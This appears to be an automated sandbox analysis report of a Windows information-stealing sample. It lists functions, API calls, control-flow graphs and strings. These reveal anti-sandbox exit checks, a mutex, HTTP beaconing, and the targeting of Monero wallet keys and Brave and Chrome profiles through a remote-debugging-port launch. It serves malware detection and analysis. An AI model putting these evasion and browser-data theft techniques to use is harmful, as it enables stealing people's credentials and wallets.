                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: 004f8296652f6a7b91e14e512e65b996f540700e87a62005f9a9590c02fed05b
                                  • Instruction ID: 1411085e785eb4418f16085af96c6c0d050a41097ddccaff09de6ffe20a085ad
                                  • Opcode Fuzzy Hash: 004f8296652f6a7b91e14e512e65b996f540700e87a62005f9a9590c02fed05b
                                  • Instruction Fuzzy Hash: 4431FC71A18208AACB84F7E0DC66FFE737BEF04704F50091CF11266292DF70A945976A
                                  Function 006C6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 6c6d93 1437 6c6daa 1436->1437 1439 6c6dac-6c6dc2 call 6c6bc0 call 6c5d60 CloseHandle ExitProcess 1437->1439 1440 6c6d5a-6c6d77 call 6cade0 OpenEventA 1437->1440 1446 6c6d79-6c6d91 call 6cade0 CreateEventA 1440->1446 1447 6c6d95-6c6da4 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01479118,?,006D10F4,?,00000000,?,006D10F8,?,00000000,006D0AF3), ref: 006C6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006C6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 006C6D99
                                  • Sleep.KERNEL32(00001770), ref: 006C6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01479118,?,006D10F4,?,00000000,?,006D10F8,?,00000000,006D0AF3), ref: 006C6DBA
                                  • ExitProcess.KERNEL32 ref: 006C6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 01f2e5108c593368e8f5bd3548ee0ee6cfa60916a10f3ebafd54072cd8c1dc42
                                  • Instruction ID: dd1019aa852134c796c53ab8c49bdf966a5eb37881e6db7695987714aa30ecf5
                                  • Opcode Fuzzy Hash: 01f2e5108c593368e8f5bd3548ee0ee6cfa60916a10f3ebafd54072cd8c1dc42
                                  • Instruction Fuzzy Hash: DAF03A70A4C209ABEB40ABE0DC4AFBDB276EF04B05F20051DB513A5291CBB0B501DB69
                                  Function 006B4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: f84f05e08c1a7a15203c7f962ce7680a4a3e4ee53e48a29cc5d6a3508549992d
                                  • Instruction ID: d3128b6668e8f61b8770ea9243c96f76addf160a360cfc34c41d258f429b3083
                                  • Opcode Fuzzy Hash: f84f05e08c1a7a15203c7f962ce7680a4a3e4ee53e48a29cc5d6a3508549992d
                                  • Instruction Fuzzy Hash: 82213EB1D00209ABDF14DFA4E849BDEBB75FF45320F108629F915A7280EB706A05CB91
                                  Function 006C5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B62D0: InternetOpenA.WININET(006D0DFF,00000001,00000000,00000000,00000000), ref: 006B6331
                                    • Part of subcall function 006B62D0: StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B6353
                                    • Part of subcall function 006B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B6385
                                    • Part of subcall function 006B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B63D5
                                    • Part of subcall function 006B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006B640F
                                    • Part of subcall function 006B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006B6421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C5478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 5726bf021459e2179658486af86ee34143cc7ee1e8fc97f3492ef8b06dd26ef4
                                  • Instruction ID: 148fd3502a521e80abc9d09f566a4359ef0c1323932a4a63fbd76c16d4aa6ff0
                                  • Opcode Fuzzy Hash: 5726bf021459e2179658486af86ee34143cc7ee1e8fc97f3492ef8b06dd26ef4
                                  • Instruction Fuzzy Hash: 6311F87090000CAACB54FBE4D9A2FFD732AEF50344F80455CA91B5A592EB30AB44CA99
                                  Function 006B1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1493 6b1220-6b1247 call 6c8b40 GlobalMemoryStatusEx 1496 6b1249-6b1271 call 6cdd30 * 2 1493->1496 1497 6b1273-6b127a 1493->1497 1499 6b1281-6b1285 1496->1499 1497->1499 1501 6b129a-6b129d 1499->1501 1502 6b1287 1499->1502 1504 6b1289-6b1290 1502->1504 1505 6b1292-6b1294 ExitProcess 1502->1505 1504->1501 1504->1505
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006B123E
                                  • ExitProcess.KERNEL32 ref: 006B1294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: ca127862c7835be357928fb9b9ac7cb52b372bfe7dae8dbb2f8b55b41aac58f4
                                  • Instruction ID: 6d889fc0a4a94e064026ff3a694c1557466cad29bb5568e500cad31e34cd4e76
                                  • Opcode Fuzzy Hash: ca127862c7835be357928fb9b9ac7cb52b372bfe7dae8dbb2f8b55b41aac58f4
                                  • Instruction Fuzzy Hash: 62014BF0D44308FAEB10DFE0CC5ABEEBB79AF14705F608459E605BA2C1C674AA818759
                                  Function 006C7A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 006C7ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 028d4e729a657117ca7011353d8839bf485116ac975238b0c86bef5336f37a81
                                  • Instruction ID: cbe4c596145261267150ddaf697d56035c687ec620c8a5d377501cfa78bdb480
                                  • Opcode Fuzzy Hash: 028d4e729a657117ca7011353d8839bf485116ac975238b0c86bef5336f37a81
                                  • Instruction Fuzzy Hash: 980181B1A08249ABC700CFD8DD85FAEFBB8FB44711F20022AF515E2380D7B45A008BA1
                                  Function 006B1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006B112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 006B1132
                                  • ExitProcess.KERNEL32 ref: 006B1143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 8c95c3f9b3d74f51f90481d62f90d69ed55034920140f44d8453f4b4b7c4d11d
                                  • Instruction ID: 51356e4cfae52c92d245ac99bf8a15936193afaf5b83561b3a63916a643b6387
                                  • Opcode Fuzzy Hash: 8c95c3f9b3d74f51f90481d62f90d69ed55034920140f44d8453f4b4b7c4d11d
                                  • Instruction Fuzzy Hash: E0E0867095D308FBE7106BD09C0EF4CB6689B04B05F200044F7087A2D0C6B465405B58
                                  Function 006B10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006B10B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006B10F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: fc66f40aeec5080551a979d3f808f543d58442a673b5a065462425488bbcd3a6
                                  • Instruction ID: 6d6127202474c52242360aafb3fb03293e9fdb66f263618dcc2fb18a22957185
                                  • Opcode Fuzzy Hash: fc66f40aeec5080551a979d3f808f543d58442a673b5a065462425488bbcd3a6
                                  • Instruction Fuzzy Hash: C8F0E2B1645208BBE714AAA4AC59FEEB798E705B14F300448F500E7380D9719E009BA4
                                  Function 006B1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006C7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7AA0
                                    • Part of subcall function 006C7A70: RtlAllocateHeap.NTDLL(00000000), ref: 006C7AA7
                                    • Part of subcall function 006C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 006C7ABF
                                    • Part of subcall function 006C79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006B11B7), ref: 006C7A10
                                    • Part of subcall function 006C79E0: RtlAllocateHeap.NTDLL(00000000), ref: 006C7A17
                                    • Part of subcall function 006C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006C7A2F
                                  • ExitProcess.KERNEL32 ref: 006B11C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: eace6a41d17c3776598335c9462b902be2173b0f621e43f42b45987b4eedd545
                                  • Instruction ID: b2d3ca638c330c086ffa4cac9ea92997ebafe634bb6e18bd01bbfcd5f069d485
                                  • Opcode Fuzzy Hash: eace6a41d17c3776598335c9462b902be2173b0f621e43f42b45987b4eedd545
                                  • Instruction Fuzzy Hash: DCE0ECB691820566CA5077F56C16F6A328E9B1520AF00082CFA048A202E925E8405769

                                  Non-executed Functions

                                  Function 006BBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,006D0B32,006D0B2F,00000000,?,?,?,006D1450,006D0B2E), ref: 006BBEC5
                                  • StrCmpCA.SHLWAPI(?,006D1454), ref: 006BBF33
                                  • StrCmpCA.SHLWAPI(?,006D1458), ref: 006BBF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BC8A9
                                  • FindClose.KERNEL32(000000FF), ref: 006BC8BB
                                  Strings
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 006BC3B2
                                  • Preferences, xrefs: 006BC104
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 006BC495
                                  • Brave, xrefs: 006BC0E8
                                  • \Brave\Preferences, xrefs: 006BC1C1
                                  • Google Chrome, xrefs: 006BC6F8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 006BC534
                                  Memory Dump Source
